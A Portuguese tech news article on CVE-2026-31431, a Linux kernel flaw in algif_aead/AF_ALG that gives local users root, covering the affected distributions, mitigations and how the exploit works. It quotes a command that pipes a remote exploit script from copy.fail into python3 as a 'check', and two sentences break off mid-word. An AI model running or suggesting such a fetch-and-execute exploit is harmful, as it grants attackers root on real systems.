Pesquisadores da Xint Code identificaram uma vulnerabilidade crítica no sistema operacional Linux que permite acesso root imediato a qualquer usuário local sem privilégios. Essa falha representa um risco significativo para servidores multiusuário de diversos tipos, incluindo servidores web, ambientes de contêineres como Kubernetes e pipelines de integração contínua (CI/CD). A vulnerabilidade, identificada como CVE-2026-31431, afeta praticamente todas as distribuições Linux em uso atualmente e está presente desde 2017.
Embora essa vulnerabilidade não se trate de um problema de dia zero e o kernel já tenha recebido correções, o curto intervalo entre a descoberta e a divulgação pública deixou os desenvolvedores de várias distribuições com pouco tempo para implementar as necessárias atualizações de segurança.
As distribuições afetadas incluem Ubuntu 24, RHEL 10, SUSE 16 e Amazon Linux 2023. A vulnerabilidade também impacta o WSL2 do Windows, permitindo a exploração da falha com um pequeno código de apenas 732 bytes.
Verificando e corrigindo a vulnerabilidade
Para averiguar se um sistema está vulnerável, um usuário pode executar o comando curl https://copy.fail/exp | python3 && su utilizando uma conta padrão sem privilégios. É importante notar que essa prática envolve confiar em um script disponível online, sendo uma opção arriscada.
O código- Caso a correção ainda não esteja disponível para a distribuição utilizada, existem alguns métodos de mitigação. Se o kernel carrega o módulo algif_aaed, pode-se utilizar o comando echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf para desativá-lo.
Entretanto, algumas distribuições, como RHEL e WSL2, incluem esta funcionalidade diretamente no núcleo do kernel, o que exige que os usuários utilizem perfis de segurança como seccomp, AppArmor ou SELinux para impedir que usuários não autorizados abram sockets AF_ALG.
Um risco urgente no cenário digital
A equipe de segurança da Xint Code não forneceu uma explicação clara para a divulgação dessa vulnerabilidade em um momento tão antecipado. Eles apenas informaram que a descoberta foi possível com a ajuda de um assistente de Inteligência Artificial.
Dado que o código- Assim, a divulgação rápida pode ter sido uma medida necessária devido à seriedade da falha.
A exploração da vulnerabilidade se baseia em como o socket AF_ALG opera. Esse socket permite que aplicativos realizem criptografia ou descriptografia de dados, fornecendo os dados a serem processados e uma tag. Para explorar essa falha, o atacante precisa fornecer um trecho de um executável ao qual tenha acesso como tag; a opção mais simples e comum sendo o comando su.
A função do kernel algif_aead possui uma otimização interna que não cria cópias dos dados que estão sendo criptografados, mas sim encadeia esses dados da tag diretamente no buffer de saída. O processo resulta em que, uma vez que os dados de “su” são inseridos, eles ficam diretamente relacionados ao arquivo de saída, corrompendo-o e concedendo acesso de administrador. Como tudo ocorre na memória, não há registros detectáveis em disco, permitindo que a vulnerabilidade evite a interferência de muitos sistemas de segurança tradicionais.
Esta situação ressalta a importância da segurança em ambientes de TI, onde a exploração de vulnerabilidades pode resultar em sérios riscos à integridade dos dados e das operações. As organizações são aconselhadas a monitorar informações adicionais sobre esta falha e implementar as correções assim que disponíveis.
Fonte:: adrenaline.com.br
